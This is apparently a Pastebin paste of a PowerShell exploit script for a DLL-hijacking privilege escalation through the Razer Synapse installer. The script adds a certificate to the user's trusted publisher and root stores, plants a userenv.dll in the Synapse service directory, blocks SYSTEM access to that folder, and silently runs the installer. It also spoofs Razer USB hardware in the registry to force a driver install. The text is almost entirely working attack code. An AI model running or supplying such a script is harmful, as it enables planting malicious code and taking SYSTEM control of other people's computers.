Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###------------------IMPORTING THE CERTIFICATE TO TRUSTED ZONE--------------------------------------
- # Define the path to your .pfx file
- $pfxPath = "C:\Temp\code_signing_cert.pfx"
- # Import the certificate without a password into the current user's Trusted Root
- $pfx = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2
- $pfx.Import($pfxPath, $null, [System.Security.Cryptography.X509Certificates.X509KeyStorageFlags]::PersistKeySet)
- # Add the certificate to the Trusted Publishers store
- $store = New-Object System.Security.Cryptography.X509Certificates.X509Store "TrustedPublisher", "CurrentUser"
- $store.Open([System.Security.Cryptography.X509Certificates.OpenFlags]::ReadWrite)
- $store.Add($pfx)
- $store.Close()
- # (Optional) adding it to the Root store to fully trust it
- $rootStore = New-Object System.Security.Cryptography.X509Certificates.X509Store "Root", "CurrentUser"
- $rootStore.Open([System.Security.Cryptography.X509Certificates.OpenFlags]::ReadWrite)
- $rootStore.Add($pfx)
- $rootStore.Close()
- #------------------Create the vulnerable directory--------------------
- # Define the directory path
- $directoryPath = 'C:\ProgramData\Razer\Synapse3\Service'
- New-Item -ItemType Directory -Path $directoryPath -Force
- #Moving the dll file to the vulnerable direction. As an alternative solution, it's possible to download the file from a hosting server.
- Move-Item -Path "C:\Temp\userenv.dll" -Destination "C:\ProgramData\Razer\Synapse3\Service" -Force
- # Define the path to the directory
- $directoryPath = "C:\ProgramData\Razer\Synapse3\Service"
- # Verify that the directory exists and block SYSTEM access
- if (Test-Path -Path $directoryPath) {
- # Create a new Deny access rule for the SYSTEM account
- $denyRule = New-Object System.Security.AccessControl.FileSystemAccessRule("SYSTEM", "FullControl", "Deny")
- # Directly modify the ACL to block access for SYSTEM
- $acl = (Get-Item $directoryPath).GetAccessControl('Access')
- $acl.AddAccessRule($denyRule)
- (Get-Item $directoryPath).SetAccessControl($acl)
- }
- # Define the path to the installer, as an alternative solution, it can be downloaded from a hosting server
- $installerPath = "C:\Temp\Razer_Synapse_3.6.exe"
- #Installing the Razer Synapse
- Start-Process -FilePath $installerPath -ArgumentList "/silent", "/quiet", "/norestart" -Wait
- #------------------------------------EXtra effort which didn't trigger the driver installation-----------------------------
- #Emulate the hardware by setting the necessary registry keys
- $vendorID = "1532"
- $deviceID = "008A"
- $regPath = "HKLM:\SYSTEM\CurrentControlSet\Enum\USB\VID_$vendorID&PID_$deviceID"
- # Create the registry structure to emulate the Razer hardware
- New-Item -Path $regPath -Force | Out-Null
- New-ItemProperty -Path $regPath -Name "DeviceDesc" -Value "Razer Virtual Mouse" -PropertyType String -Force | Out-Null
- New-ItemProperty -Path $regPath -Name "HardwareID" -Value "USB\VID_$vendorID&PID_$deviceID" -PropertyType MultiString -Force | Out-Null
- #_---------------------TO trigger the windows update----------------------------------------
- # Trigger Windows Update to check for new drivers
- $updateSession = New-Object -ComObject Microsoft.Update.Session
- $updateSearcher = $updateSession.CreateUpdateSearcher()
- # Search for driver updates that are not yet installed
- $searchResult = $updateSearcher.Search("IsInstalled=0 and Type='Driver'")
- # Check if any driver updates are found
- if ($searchResult.Updates.Count -gt 0) {
- # Prepare to install all found driver updates
- $updatesToInstall = New-Object -ComObject Microsoft.Update.UpdateColl
- foreach ($update in $searchResult.Updates) {
- $updatesToInstall.Add($update) | Out-Null
- }
- # Install the updates
- $installer = $updateSession.CreateUpdateInstaller()
- $installer.Updates = $updatesToInstall
- $installationResult = $installer.Install()
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
